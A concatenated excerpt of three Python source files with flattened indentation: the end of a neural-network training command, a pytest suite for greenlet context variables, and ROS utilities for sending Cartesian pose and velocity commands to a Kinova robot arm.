loaded_data[o.data_iterator] = di.next()
data = loaded_data[o.data_iterator]
for v, d in o.dataset_assign.items():
dest_context = config.global_config.default_context if not o.forward_sequence or v not in o.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance, data[
di.variables.index(d)], ctx=dest_context,
data_name=d, variable_name=v.name)
# Generate data
for v, generator in o.generator_assign.items():
dest_context = config.global_config.default_context if not o.forward_sequence or v not in o.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance,
data=generator(v.shape), ctx=dest_context,
variable_name=v.name)
# Monitor loss before forward to prepare input data while processing on
# GPU
if cost.variables:
for l in cost.variables:
cost.sum_iteration += np.mean(l.variable_instance.d)
l.variable_instance.data.zero()
if is_first_optimizer:
is_first_optimizer = False
_sum_cost()
if single_or_rankzero():
progress("Training : cost={0:0.6f}".format(cost.sum_iteration),
(iter % config.training_config.iter_per_epoch) * 1.0 / config.training_config.iter_per_epoch)
cost.sum_iteration = 0.0
# Forward
o.network.forward(o.forward_sequence)
# Backward
o.network.backward(o.backward_sequence, iter % o.update_interval == 0)
# Update
if iter % o.update_interval == o.update_interval - 1:
if o.weight_decay > 0:
o.solver.weight_decay(o.weight_decay)
if o.comm: # Updated param with communicator
params = [x.grad for x in o.parameters.values()]
_all_reduce(o.comm, params, division=True, inplace=True)
if o.scheduler is not None:
o.solver.set_learning_rate(o.scheduler.get_learning_rate(iter))
o.solver.update()
# Sync w sometimes
if iter % 10 == 9: # TODO: change the interval
if o.comm:
params = [x.data for x in o.parameters.values()]
_all_reduce(o.comm, params, division=True, inplace=True)
# Reserve monitor loss
cost.variables = o.loss_variables
# Monitor loss at the end of iteration
if iter % config.training_config.iter_per_epoch == config.training_config.iter_per_epoch - 1 and cost.variables:
for l in cost.variables:
cost.sum_iteration += np.mean(l.variable_instance.d)
l.variable_instance.data.zero()
_sum_cost()
cost.variables = None
cost.sum_iteration = 0.0
return cost
def _evaluate(args, config, monitoring_report, best_error, epoch):
comm = current_communicator()
error_str = ''
valid_error = 0.0
def _sum_error(sum, error):
ret = None
if comm:
# logger.log(99, "Calc error with communicator")
var = [nn.NdArray()]
var[0].data = error
_all_reduce(comm, var, division=False, inplace=True)
ret = sum + var[0].data
else:
ret = sum + error
return ret
for name, mon in config.monitors.items():
m = mon.monitor
error_sum_monitor = 0.0
error_count = 0
di = mon.data_iterator
for i in range(di.size // di.batch_size):
# Set data to variable
data = di.next()
for v, d in m.dataset_assign.items():
dest_context = config.global_config.default_context if not m.forward_sequence or v not in m.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance, data[
di.variables.index(d)], ctx=dest_context,
data_name=d, variable_name=v.name)
# Generate data
for v, generator in m.generator_assign.items():
dest_context = config.global_config.default_context if not m.forward_sequence or v not in m.forward_sequence[
0].inputs else None
let_data_to_variable(v.variable_instance,
data=generator(v.shape), ctx=dest_context,
variable_name=v.name)
# Sum error before forward to prepare input data while processing
# on GPU
if error_count > 0:
error_sum = 0.0
for v in m.monitor_variables:
error_sum += np.mean(v.variable_instance.d)
v.variable_instance.data.zero()
error_sum_monitor = _sum_error(error_sum_monitor, error_sum)
if single_or_rankzero():
progress('Evaluating "{0}"'.format(
name) + ' : error={0:0.6f}'.format(
error_sum_monitor / error_count),
di.position * 1.0 / di.size)
error_count += comm.size if comm else 1
# Forward recursive
m.network.forward(m.forward_sequence)
# Sum error at the end of dataset
error_sum = 0.0
for v in m.monitor_variables:
error_sum += np.mean(v.variable_instance.d)
v.variable_instance.data.zero()
error_sum_monitor = _sum_error(error_sum_monitor, error_sum)
if error_count == 0:
error = 0
else:
error = error_sum_monitor / error_count
monitoring_report.append(' {}: {}\n'.format(name, error))
if error_str != '':
error_str += ', '
else:
error_str = ' {'
error_str += '{}={:.6f}'.format(name, error)
if name == 'valid_error':
valid_error = error
if error_str != '':
error_str += '}'
# Save Parameters
if single_or_rankzero():
if (not config.training_config.save_best) or \
(not best_error) or \
(best_error is not None and valid_error <= best_error):
best_error = valid_error
_save_parameters(args, 'best', epoch, True)
return best_error, error_str
def _get_current_parameter(args):
globname = os.path.join(args.outdir, 'results_current_*.nnp')
exists = glob.glob(globname)
if len(exists) > 0:
ex_list = {}
for ex in exists:
n = int(ex.rsplit('_', 1)[1].rsplit('.', 1)[0])
ex_list[n] = ex
last_epoch = sorted(ex_list.keys())[0]
last_parameter = ex_list[last_epoch]
logger.log(99, "Load parameter from [{}]".format(
os.path.basename(last_parameter)))
load.load([last_parameter], parameter_only=True)
return last_epoch
return 0
def _calc_estimate_time(timeinfo, max_iter, last_iter, iter):
timeinfo.past_time = time.time() - timeinfo.start_time
timeinfo.estimate_time = timeinfo.past_time * \
(max_iter - last_iter) / (iter - last_iter)
timeinfo.remain_time = timeinfo.estimate_time - timeinfo.past_time
timeinfo.last_past_time = timeinfo.past_time
return timeinfo
def _train(args, config):
global _save_parameter_info
comm = current_communicator()
last_epoch = 0
if args.resume:
last_epoch = _get_current_parameter(args)
logger.log(99, "Resume from epoch {}".format(last_epoch + 1))
max_iteration = config.training_config.max_epoch * \
config.training_config.iter_per_epoch
if single_or_rankzero():
logger.log(99, 'Training epoch {} of {} begin'.format(last_epoch + 1,
config.training_config.max_epoch))
class Cost:
pass
cost = Cost()
cost.sum_epoch = 0.0
cost.num_iteration = 0
cost.sum_iteration = 0.0
cost.variables = None
best_error = None
class TimeInfo:
pass
timeinfo = TimeInfo()
timeinfo.last_past_time = None
if max_iteration > 0:
last_iteration = last_epoch * config.training_config.iter_per_epoch
if last_iteration < max_iteration:
timeinfo.start_time = time.time()
for iteration in range(last_iteration, max_iteration):
cost = _update(iteration, config, cost)
if (iteration - last_iteration) > 0:
timeinfo = _calc_estimate_time(
timeinfo, max_iteration, last_iteration, iteration)
if config.timelimit > 0 and timeinfo.estimate_time > config.timelimit:
logger.log(99, 'Expected training time ({:.3f}s) will exceed time limit ({}s).'.format(
timeinfo.estimate_time, config.timelimit))
return False
if (iteration + 1) % config.training_config.iter_per_epoch == 0:
last_past_time = -1
# End of epoch
epoch = iteration // config.training_config.iter_per_epoch + 1
cost_avg_epoch = cost.sum_epoch / cost.num_iteration
cost.sum_epoch = 0.0
cost.num_iteration = 0
monitoring_report = []
# Evaluation
error_str = ''
if epoch % config.training_config.monitor_interval == 0 or epoch <= 5:
best_error, error_str = _evaluate(
args, config, monitoring_report, best_error, epoch)
if single_or_rankzero():
# Write to monitoring_report.yml
f = open(os.path.join(
args.outdir, 'monitoring_report.yml'), 'a')
f.write('{}:\n'.format(epoch - 1))
f.write(' cost: {}\n'.format(cost_avg_epoch))
for s in monitoring_report:
f.write(s)
f.close()
_save_parameters(args, 'current', epoch)
logger.log(99, 'epoch {} of {} cost={:.6f} {} time=({:.1f}s /{:.1f}s)'.format(
epoch, config.training_config.max_epoch, cost_avg_epoch, error_str,
timeinfo.past_time, timeinfo.estimate_time))
if single_or_rankzero():
_save_parameters(args, 'current', epoch, True)
return True
def train_command(args):
if single_or_rankzero():
configure_progress(os.path.join(args.outdir, 'progress.txt'))
info = load.load([args.config], exclude_parameter=True)
# Check dataset uri is empty.
dataset_error = False
for dataset in info.datasets.values():
if dataset.uri.strip() == '':
dataset_error = True
if dataset_error:
logger.log(99, 'Fatal error. Dataset URI is empty.')
return False
class TrainConfig:
pass
config = TrainConfig()
config.timelimit = -1
if args.param:
load.load([args.param], parameter_only=True)
config.global_config = info.global_config
config.training_config = info.training_config
if single_or_rankzero():
logger.log(99, 'Train with contexts {}'.format(available_contexts))
class OptConfig:
pass
config.optimizers = OrderedDict()
for name, opt in info.optimizers.items():
o = OptConfig()
o.optimizer = opt
o.data_iterator = None
config.optimizers[name] = o
class MonConfig:
pass
config.monitors = OrderedDict()
for name, mon in info.monitors.items():
m = MonConfig()
m.monitor = mon
m.data_iterator = None
config.monitors[name] = m
# Training
comm = current_communicator()
config.training_config.iter_per_epoch //= comm.size if comm else 1
max_iteration = config.training_config.max_epoch * \
config.training_config.iter_per_epoch
global _save_parameter_info
_save_parameter_info = {}
_, config_ext = os.path.splitext(args.config)
if config_ext == '.prototxt' or config_ext == '.nntxt':
_save_parameter_info['config'] = args.config
elif config_ext == '.nnp':
with zipfile.ZipFile(args.config, 'r') as nnp:
for name in nnp.namelist():
_, ext = os.path.splitext(name)
if ext == '.nntxt' or ext == '.prototxt':
nnp.extract(name, args.outdir)
_save_parameter_info['config'] = os.path.join(
args.outdir, name)
result = False
if max_iteration > 0:
data_iterators = {'optimizer': {}, 'monitor': {}}
rng = np.random.RandomState(comm.rank if comm else 0)
with ExitStack() as stack:
for name, o in config.optimizers.items():
o.data_iterator = stack.enter_context(
o.optimizer.data_iterator())
if comm and comm.size > 1:
o.data_iterator = o.data_iterator.slice(
rng, comm.size, comm.rank)
for name, m in config.monitors.items():
m.data_iterator = stack.enter_context(
m.monitor.data_iterator())
if comm and comm.size > 1:
m.data_iterator = m.data_iterator.slice(
rng, comm.size, comm.rank)
result = _train(args, config)
else:
# save parameters without training (0 epoch learning)
logger.log(99, '0 epoch learning. (Just save parameter.)')
if single_or_rankzero():
_save_parameters(args, 'current', 0, True)
result = True
if single_or_rankzero():
if result:
logger.log(99, 'Training Completed.')
else:
logger.log(99, 'Training Incompleted.')
if single_or_rankzero():
progress(None)
return True
def add_train_command(subparsers):
# Train
subparser = subparsers.add_parser('train', help='Training with NNP.')
subparser.add_argument(
'-r', '--resume', help='resume from last saved parameter.', action='store_true')
subparser.add_argument(
'-c', '--config', help='path to nntxt', required=True)
subparser.add_argument(
'-p', '--param', help='path to parameter file', required=False)
subparser.add_argument(
'-o', '--outdir', help='output directory', required=True)
subparser.set_defaults(func=train_command)
|
test_greenlet_contextvars.py | import pytest, sys
from functools import partial
from greenlet import greenlet
from greenlet import getcurrent
from greenlet import GREENLET_USE_CONTEXT_VARS
from contextvars import Context
from contextvars import ContextVar
from contextvars import copy_context
def test_context_vars_enabled_on_py37():
assert GREENLET_USE_CONTEXT_VARS is True
def test_minimal_set():
def _increment(greenlet_id, ctx_var, callback):
assert ctx_var.get() == "not started"
ctx_var.set(greenlet_id)
for _ in range(2):
callback()
assert id_var.get() == greenlet_id
assert getcurrent().gr_context[id_var] == greenlet_id
id_var = ContextVar("id", default=None)
id_var.set("not started")
callback = getcurrent().switch
lets = [
greenlet(partial(
_increment,
greenlet_id=i,
ctx_var=id_var,
callback=callback,
))
for i in range(1, 5)
]
for let in lets:
let.gr_context = copy_context()
assert let.gr_context[id_var] == "not started"
id_var.set("in main")
for let in lets:
assert let.gr_context[id_var] == "not started"
for i in range(3):
assert id_var.get() == "in main"
for let in lets:
let.switch()
assert id_var.get() == "in main"
for (i, let) in zip(range(1, 5), lets):
assert let.dead
assert let.gr_context[id_var] == i
# the rest mostly copied from CPython's greenlet
class TestContextVars:
def assertEqual(self, x, y): assert x == y
def assertIs(self, x, y): assert x is y
def assertIsNone(self, x): assert x is None
def assertTrue(self, x): assert x
def assertIsInstance(self, x, y): assert isinstance(x, y)
def _new_ctx_run(self, *args, **kwargs):
return copy_context().run(*args, **kwargs)
def _increment(self, greenlet_id, ctx_var, callback, counts, expect):
if expect is None:
self.assertIsNone(ctx_var.get())
else:
self.assertEqual(ctx_var.get(), expect)
ctx_var.set(greenlet_id)
for _ in range(2):
counts[ctx_var.get()] += 1
callback()
def _test_context(self, propagate_by):
id_var = ContextVar("id", default=None)
id_var.set(0)
callback = getcurrent().switch
counts = dict((i, 0) for i in range(5))
lets = [
greenlet(partial(
partial(
copy_context().run,
self._increment
) if propagate_by == "run" else self._increment,
greenlet_id=i,
ctx_var=id_var,
callback=callback,
counts=counts,
expect=(
i - 1 if propagate_by == "share" else
0 if propagate_by in ("set", "run") else None
)
))
for i in range(1, 5)
]
for let in lets:
if propagate_by == "set":
let.gr_context = copy_context()
elif propagate_by == "share":
let.gr_context = getcurrent().gr_context
else:
self.assertIsNone(let.gr_context)
for i in range(2):
counts[id_var.get()] += 1
for let in lets:
let.switch()
if propagate_by == "run":
# Must leave each context.run() in reverse order of entry
for let in reversed(lets):
let.switch()
else:
# No context.run(), so fine to exit in any order.
for let in lets:
let.switch()
for let in lets:
self.assertTrue(let.dead)
# When using run(), we leave the run() as the greenlet dies,
# and there's no context "underneath". When not using run(),
# gr_context still reflects the context the greenlet was
# running in.
self.assertEqual(let.gr_context is None, propagate_by == "run")
if propagate_by == "share":
self.assertEqual(counts, {0: 1, 1: 1, 2: 1, 3: 1, 4: 6})
else:
self.assertEqual(set(counts.values()), set([2]))
def test_context_propagated_by_context_run(self):
self._new_ctx_run(self._test_context, "run")
def test_context_propagated_by_setting_attribute(self):
self._new_ctx_run(self._test_context, "set")
def test_context_not_propagated(self):
self._new_ctx_run(self._test_context, None)
def test_context_shared(self):
self._new_ctx_run(self._test_context, "share")
def test_break_ctxvars(self):
let1 = greenlet(copy_context().run)
let2 = greenlet(copy_context().run)
let1.switch(getcurrent().switch)
let2.switch(getcurrent().switch)
# Since let2 entered the current context and let1 exits its own, the
# interpreter emits:
# RuntimeError: cannot exit context: thread state references a different context object
let1.switch()
def test_not_broken_if_using_attribute_instead_of_context_run(self):
let1 = greenlet(getcurrent().switch)
let2 = greenlet(getcurrent().switch)
let1.gr_context = copy_context()
let2.gr_context = copy_context()
let1.switch()
let2.switch()
let1.switch()
let2.switch()
def test_context_assignment_while_running(self):
id_var = ContextVar("id", default=None)
def target():
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
# Context is created on first use
id_var.set(1)
self.assertIsInstance(gr.gr_context, Context)
self.assertEqual(id_var.get(), 1)
self.assertEqual(gr.gr_context[id_var], 1)
# Clearing the context makes it get re-created as another
# empty context when next used
old_context = gr.gr_context
gr.gr_context = None # assign None while running
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
id_var.set(2)
self.assertIsInstance(gr.gr_context, Context)
self.assertEqual(id_var.get(), 2)
self.assertEqual(gr.gr_context[id_var], 2)
new_context = gr.gr_context
getcurrent().parent.switch((old_context, new_context))
# parent switches us back to old_context
self.assertEqual(id_var.get(), 1)
gr.gr_context = new_context # assign non-None while running
self.assertEqual(id_var.get(), 2)
getcurrent().parent.switch()
# parent switches us back to no context
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
gr.gr_context = old_context
self.assertEqual(id_var.get(), 1)
getcurrent().parent.switch()
# parent switches us back to no context
self.assertIsNone(id_var.get())
self.assertIsNone(gr.gr_context)
gr = greenlet(target)
with pytest.raises(AttributeError) as e:
del gr.gr_context
assert "can't delete attr" in str(e.value)
self.assertIsNone(gr.gr_context)
old_context, new_context = gr.switch()
self.assertIs(new_context, gr.gr_context)
self.assertEqual(old_context[id_var], 1)
self.assertEqual(new_context[id_var], 2)
self.assertEqual(new_context.run(id_var.get), 2)
gr.gr_context = old_context # assign non-None while suspended
gr.switch()
self.assertIs(gr.gr_context, new_context)
gr.gr_context = None # assign None while suspended
gr.switch()
self.assertIs(gr.gr_context, old_context)
gr.gr_context = None
gr.switch()
self.assertIsNone(gr.gr_context)
# Make sure there are no reference leaks (CPython only)
#gr = None
#gc.collect()
#self.assertEqual(sys.getrefcount(old_context), 2)
#self.assertEqual(sys.getrefcount(new_context), 2)
def test_context_assignment_different_thread(self):
import threading
ctx = Context()
var = ContextVar("var", default=None)
is_running = threading.Event()
should_suspend = threading.Event()
did_suspend = threading.Event()
should_exit = threading.Event()
holder = []
def greenlet_in_thread_fn():
var.set(1)
is_running.set()
should_suspend.wait()
var.set(2)
getcurrent().parent.switch()
holder.append(var.get())
def thread_fn():
gr = greenlet(greenlet_in_thread_fn)
gr.gr_context = ctx
holder.append(gr)
gr.switch()
did_suspend.set()
should_exit.wait()
gr.switch()
thread = threading.Thread(target=thread_fn, daemon=True)
thread.start()
is_running.wait()
gr = holder[0]
# Can't access or modify context if the greenlet is running
# in a different thread. Don't check that on top of PyPy though,
# because it's not implemented (open to race conditions when we
# implement it at pure Python, which could be fixed by adding
# locking everywhere, which is totally not worth it IMHO).
if sys.implementation.name == 'cpython':
with pytest.raises(ValueError) as e:
getattr(gr, 'gr_context')
assert "running in a different" in str(e.value)
with pytest.raises(ValueError) as e:
gr.gr_context = None
assert "running in a different" in str(e.value)
should_suspend.set()
did_suspend.wait()
# OK to access and modify context if greenlet is suspended
self.assertIs(gr.gr_context, ctx)
self.assertEqual(gr.gr_context[var], 2)
gr.gr_context = None
should_exit.set()
thread.join()
self.assertEqual(holder, [gr, None])
# Context can still be accessed/modified when greenlet is dead:
self.assertIsNone(gr.gr_context)
gr.gr_context = ctx
self.assertIs(gr.gr_context, ctx)
|
rl_movement_utils.py | #! /usr/bin/env python
"""A helper program to test cartesian goals for the JACO and MICO arms."""
import copy
from turtle import rt
import roslib
import rospy
import sys
import numpy as np
import threading, time
import actionlib
import kinova_msgs.msg
from rospy.client import wait_for_message
import std_msgs.msg
import geometry_msgs.msg
from geometry_msgs.msg import PoseStamped
import moveit_msgs.srv
from tf.transformations import euler_from_quaternion
import math
import argparse
from kinova_msgs.srv import AddPoseToCartesianTrajectory, ClearTrajectories
""" Global variable """
arm_joint_number = 0
finger_number = 0
prefix = 'NO_ROBOT_TYPE_DEFINED_'
finger_maxDist = 18.9/2/1000 # max distance for one finger
finger_maxTurn = 6800 # max thread rotation for one finger
currentCartesianCommand = [0.212322831154, -0.257197618484, 0.509646713734, 1.63771402836, 1.11316478252, 0.134094119072] # default home in unit mq
def cartesian_pose_client(position, orientation, rad_pose, collision_check=False, wait_for_action=False):
# if wait_for_action the robot will preform the action till completion the stop.
# else the action will be sent to a buffer of actions
"""Send a cartesian goal to the action server."""
action_address = '/' + prefix + 'driver/pose_action/tool_pose'
client = actionlib.SimpleActionClient(action_address, kinova_msgs.msg.ArmPoseAction)
client.wait_for_server()
rospy.wait_for_service('/j2s7s300_driver/in/add_pose_to_Cartesian_trajectory')
cartesian_serv = rospy.ServiceProxy('/j2s7s300_driver/in/add_pose_to_Cartesian_trajectory', AddPoseToCartesianTrajectory)
rospy.wait_for_service('/j2s7s300_driver/in/clear_trajectories')
cartesian_clear = rospy.ServiceProxy('/j2s7s300_driver/in/clear_trajectories', ClearTrajectories)
goal = kinova_msgs.msg.ArmPoseGoal()
goal.pose.header = std_msgs.msg.Header(frame_id=(prefix + 'link_base'))
goal.pose.pose.position = geometry_msgs.msg.Point(
x=position[0], y=position[1], z=position[2])
goal.pose.pose.orientation = geometry_msgs.msg.Quaternion(
x=orientation[0], y=orientation[1], z=orientation[2], w=orientation[3])
euler_angle = [orientation[0],orientation[1],orientation[2],orientation[3]]
#goal_list = [position[0],position[1], position[2], euler_angle[0], euler_angle[1],euler_angle[2]]
goal_list = rad_pose
#print(euler_angle, "AAAAAA")
# print('goal.pose in client 1: {}'.format(goal.pose.pose)) # debug
if collision_check:
rospy.wait_for_service('compute_ik')
compute_ik = rospy.ServiceProxy('compute_ik', moveit_msgs.srv.GetPositionIK)
goal_stamped = geometry_msgs.msg.PoseStamped()
goal_stamped.header = goal.pose.header
goal_stamped.pose = goal.pose.pose
msgs_request = moveit_msgs.msg.PositionIKRequest()
msgs_request.group_name = "arm"
msgs_request.pose_stamped = goal_stamped
msgs_request.robot_state.is_diff = True
msgs_request.timeout.secs = 2
msgs_request.avoid_collisions = True
msgs_request.ik_link_names = ["j2s7s300_joint_1", "j2s7s300_joint_2", "j2s7s300_joint_3", "j2s7s300_joint_4",
"j2s7s300_joint_5", "j2s7s300_joint_6", "j2s7s300_joint_7"]
# msgs_request.robot_state = self.robot.get_current_state()
try:
jointAngle=compute_ik(msgs_request)
ans=list(jointAngle.solution.joint_state.position)[2:9]
ans = simplify_joints(ans)
if jointAngle.error_code.val == -31:
print('No IK solution')
return -31
if (jointAngle.error_code.val == -12 or jointAngle.error_code.val==-10):
print("Goal or current position is in collision")
return -12
except rospy.ServiceException as e:
print("Service call failed: %s"%e)
#cartesian_serv(0.144489221573,-0.462273001671, 0.40168389678,1.6176496614678213, -0.20928853117355628, 1.111220579362625)
if wait_for_action:
client.send_goal(goal)
if client.wait_for_result(rospy.Duration(2.0)):
return client.get_result()
else:
client.cancel_all_goals()
print(' the cartesian action timed-out')
return None
else:
try:
cartesian_serv(goal_list[0], goal_list[1], goal_list[2],goal_list[3],goal_list[4],goal_list[5])
#cartesian_clear()
except rospy.ServiceException as e:
print("Cartesian service call failed: %s"%e)
def QuaternionNorm(Q_raw):
qx_temp,qy_temp,qz_temp,qw_temp = Q_raw[0:4]
qnorm = math.sqrt(qx_temp*qx_temp + qy_temp*qy_temp + qz_temp*qz_temp + qw_temp*qw_temp)
qx_ = qx_temp/qnorm
qy_ = qy_temp/qnorm
qz_ = qz_temp/qnorm
qw_ = qw_temp/qnorm
Q_normed_ = [qx_, qy_, qz_, qw_]
return Q_normed_
def Quaternion2EulerXYZ(Q_raw):
Q_normed = QuaternionNorm(Q_raw)
qx_ = Q_normed[0]
qy_ = Q_normed[1]
qz_ = Q_normed[2]
qw_ = Q_normed[3]
tx_ = math.atan2((2 * qw_ * qx_ - 2 * qy_ * qz_), (qw_ * qw_ - qx_ * qx_ - qy_ * qy_ + qz_ * qz_))
ty_ = math.asin(2 * qw_ * qy_ + 2 * qx_ * qz_)
tz_ = math.atan2((2 * qw_ * qz_ - 2 * qx_ * qy_), (qw_ * qw_ + qx_ * qx_ - qy_ * qy_ - qz_ * qz_))
EulerXYZ_ = [tx_,ty_,tz_]
return EulerXYZ_
def EulerXYZ2Quaternion(EulerXYZ_):
tx_, ty_, tz_ = EulerXYZ_[0:3]
sx = math.sin(0.5 * tx_)
cx = math.cos(0.5 * tx_)
sy = math.sin(0.5 * ty_)
cy = math.cos(0.5 * ty_)
sz = math.sin(0.5 * tz_)
cz = math.cos(0.5 * tz_)
qx_ = sx * cy * cz + cx * sy * sz
qy_ = -sx * cy * sz + cx * sy * cz
qz_ = sx * sy * cz + cx * cy * sz
qw_ = -sx * sy * sz + cx * cy * cz
Q_ = [qx_, qy_, qz_, qw_]
return Q_
def getcurrentCartesianCommand(prefix_):
# wait to get current position
topic_address = '/' + prefix_ + 'driver/out/cartesian_command'
rospy.Subscriber(topic_address, kinova_msgs.msg.KinovaPose, setcurrentCartesianCommand)
#print(prefix)
rospy.wait_for_message(topic_address, kinova_msgs.msg.KinovaPose)
#print 'position listener obtained message for Cartesian pose. '
def setcurrentCartesianCommand(feedback):
global currentCartesianCommand
currentCartesianCommand_str_list = str(feedback).split("\n")
for index in range(0,len(currentCartesianCommand_str_list)):
temp_str=currentCartesianCommand_str_list[index].split(": ")
currentCartesianCommand[index] = float(temp_str[1])
# the following directly reading only read once and didn't update the value.
# currentCartesianCommand = [feedback.X, feedback.Y, feedback.Z, feedback.ThetaX, feedback.ThetaY, feedback.Z]
# print 'currentCartesianCommand in setcurrentCartesianCommand is: ', currentCartesianCommand
def argumentParser(argument_):
""" Argument parser """
parser = argparse.ArgumentParser(description='Drive robot end-effector to command Cartesian pose')
parser.add_argument('kinova_robotType', metavar='kinova_robotType', type=str, default='j2n6a300',
help='kinova_RobotType is in format of: [{j|m|r|c}{1|2}{s|n}{4|6|7}{s|a}{2|3}{0}{0}]. eg: j2n6a300 refers to jaco v2 6DOF assistive 3fingers. Please be noted that not all options are valided for different robot types.')
parser.add_argument('unit', metavar='unit', type=str, nargs='?', default='mq',
choices={'mq', 'mdeg', 'mrad'},
help='Unit of Cartesian pose command, in mq(Position meter, Orientation Quaternion), mdeg(Position meter, Orientation Euler-XYZ in degree), mrad(Position meter, Orientation Euler-XYZ in radian)]')
parser.add_argument('pose_value', nargs='*', type=float, help='Cartesian pose values: first three values for position, and last three(unit mdeg or mrad)/four(unit mq) for Orientation')
parser.add_argument('-r', '--relative', action='store_true',
help='the input values are relative values to current position.')
parser.add_argument('-v', '--verbose', action='store_true',
help='display Cartesian pose values in alternative convention(mq, mdeg or mrad)')
# parser.add_argument('-f', action='store_true', help='assign finger values from a file')
args_ = parser.parse_args(argument_)
# print('pose_mq in argumentParser 1: {}'.format(args_.pose_value)) # debug
return args_
def kinova_robotTypeParser(kinova_robotType_):
""" Argument kinova_robotType """
global robot_category, robot_category_version, wrist_type, arm_joint_number, robot_mode, finger_number, prefix, finger_maxDist, finger_maxTurn
robot_category = kinova_robotType_[0]
robot_category_version = int(kinova_robotType_[1])
wrist_type = kinova_robotType_[2]
arm_joint_number = int(kinova_robotType_[3])
robot_mode = kinova_robotType_[4]
finger_number = int(kinova_robotType_[5])
prefix = kinova_robotType_ + "_"
finger_maxDist = 18.9/2/1000 # max distance for one finger in meter
finger_maxTurn = 6800 # max thread turn for one finger
def unitParser(unit_, pose_value_, relative_):
""" Argument unit """
global currentCartesianCommand
position_ = pose_value_[:3]
orientation_ = pose_value_[3:]
for i in range(0,3):
if relative_:
position_[i] = pose_value_[i] + currentCartesianCommand[i]
else:
position_[i] = pose_value_[i]
# print('pose_value_ in unitParser 1: {}'.format(pose_value_)) # debug
if unit_ == 'mq':
if relative_:
orientation_XYZ = Quaternion2EulerXYZ(orientation_)
orientation_xyz_list = [orientation_XYZ[i] + currentCartesianCommand[3+i] for i in range(0,3)]
orientation_q = EulerXYZ2Quaternion(orientation_xyz_list)
else:
orientation_q = orientation_
orientation_rad = Quaternion2EulerXYZ(orientation_q)
orientation_deg = list(map(math.degrees, orientation_rad))
elif unit_ == 'mdeg':
if relative_:
orientation_deg_list = list(map(math.degrees, currentCartesianCommand[3:]))
orientation_deg = [orientation_[i] + orientation_deg_list[i] for i in range(0,3)]
else:
orientation_deg = orientation_
orientation_rad = list(map(math.radians, orientation_deg))
orientation_q = EulerXYZ2Quaternion(orientation_rad)
elif unit_ == 'mrad':
if relative_:
orientation_rad_list = currentCartesianCommand[3:]
orientation_rad = [orientation_[i] + orientation_rad_list[i] for i in range(0,3)]
else:
orientation_rad = orientation_
orientation_deg = list(map(math.degrees, orientation_rad))
orientation_q = EulerXYZ2Quaternion(orientation_rad)
else:
raise Exception("Cartesian value have to be in unit: mq, mdeg or mrad")
pose_mq_ = position_ + orientation_q
pose_mdeg_ = position_ + orientation_deg
pose_mrad_ = position_ + orientation_rad
# print('pose_mq in unitParser 1: {}'.format(pose_mq_)) # debug
return pose_mq_, pose_mdeg_, pose_mrad_
def verboseParser(verbose, pose_mq_):
""" Argument verbose """
position_ = pose_mq_[:3]
orientation_q = pose_mq_[3:]
if verbose:
orientation_rad = Quaternion2EulerXYZ(orientation_q)
orientation_deg = list(map(math.degrees, orientation_rad))
"""print('Cartesian position is: {}'.format(position_))
print('Cartesian orientation in Quaternion is: ')
print('qx {:0.3f}, qy {:0.3f}, qz {:0.3f}, qw {:0.3f}'.format(orientation_q[0], orientation_q[1], orientation_q[2], orientation_q[3]))
print('Cartesian orientation in Euler-XYZ(radian) is: ')
print('tx {:0.3f}, ty {:0.3f}, tz {:0.3f}'.format(orientation_rad[0], orientation_rad[1], orientation_rad[2]))
print('Cartesian orientation in Euler-XYZ(degree) is: ')
print('tx {:3.1f}, ty {:3.1f}, tz {:3.1f}'.format(orientation_deg[0], orientation_deg[1], orientation_deg[2]))"""
def go_to_relative(pose, collision_check=False, complete_action=True):
kinova_robotTypeParser("j2s7s300")
try:
rospy.init_node(prefix + 'pose_action_client')
except:
pass
"""if args.unit == 'mq':
if len(args.pose_value) != 7:
print('Number of input values {} is not equal to 7 (3 position + 4 Quaternion).'.format(len(args.pose_value)))
sys.exit(0)
elif (args.unit == 'mrad') | (args.unit == 'mdeg'):
if len(args.pose_value) != 6:
print('Number of input values {} is not equal to 6(3 position + 3 EulerAngles).'.format(len(args.pose_value)))
sys.exit(0)
else:
raise Exception('Cartesian value have to be in unit: mq, mdeg or mrad')"""
getcurrentCartesianCommand(prefix)
#for i in range(300):
#pose = [-0.01, 0.001, 0.0, 0.0, 0.0, 0.0]
pose_mq, pose_mdeg, pose_mrad = unitParser('mdeg', pose, True)
#print(pose_mrad)
try:
poses = [float(n) for n in pose_mq]
result = cartesian_pose_client(poses[:3], poses[3:], rad_pose=pose_mrad, collision_check=collision_check, wait_for_action=complete_action)
#print('Cartesian pose sent!')
except rospy.ROSInterruptException:
print "program interrupted before completion"
verboseParser(True, poses)
return result
def publishCatesianVelocityCommands(cartVel, duration_sec, prefix="j2s7s300_"):
topic_name = '/' + prefix + 'driver/in/cartesian_velocity'
#publish joint torque commands
pub = rospy.Publisher(topic_name, kinova_msgs.msg.PoseVelocity, queue_size=1)
poseVelCmd = kinova_msgs.msg.PoseVelocity()
poseVelCmd.twist_linear_x = cartVel[0];
poseVelCmd.twist_linear_y = cartVel[1];
poseVelCmd.twist_linear_z = cartVel[2];
poseVelCmd.twist_angular_x = cartVel[3];
poseVelCmd.twist_angular_y = cartVel[4];
poseVelCmd.twist_angular_z = cartVel[5];
count = 0
rate = rospy.Rate(100)
while (count < 100*duration_sec):
count = count + 1
pub.publish(poseVelCmd)
rate.sleep()
def cartesian_velocity_req(command, duration, collision_check=False, duration_timeout=None):
"""
send cartesian velocity requests.
command: 6d cartesian velocity command
duration: duration of the velocity command
collision_check: whether or not to calculate displacement and check collision
duration_timeout: will return before duration if duration_timeout<duration
------
returns: 1 if successful, -31 if no ik, -12 if in collision, -1 if general exception
"""
if duration_timeout is None:
if collision_check is False:
try:
publishCatesianVelocityCommands(command, duration)
return 1
except Exception as e:
print(e)
return -1
else:
curr_pose = rospy.wait_for_message("/j2s7s300_driver/out/tool_pose", PoseStamped)
curr_pose_orig = copy.copy(curr_pose)
curr_pose = np.array([curr_pose.pose.position.x, curr_pose.pose.position.y, curr_pose.pose.position.z, \
curr_pose.pose.orientation.x, curr_pose.pose.orientation.y, curr_pose.pose.orientation.z])
displacement = curr_pose + duration*np.array(command)
print(displacement)
rospy.wait_for_service('compute_ik')
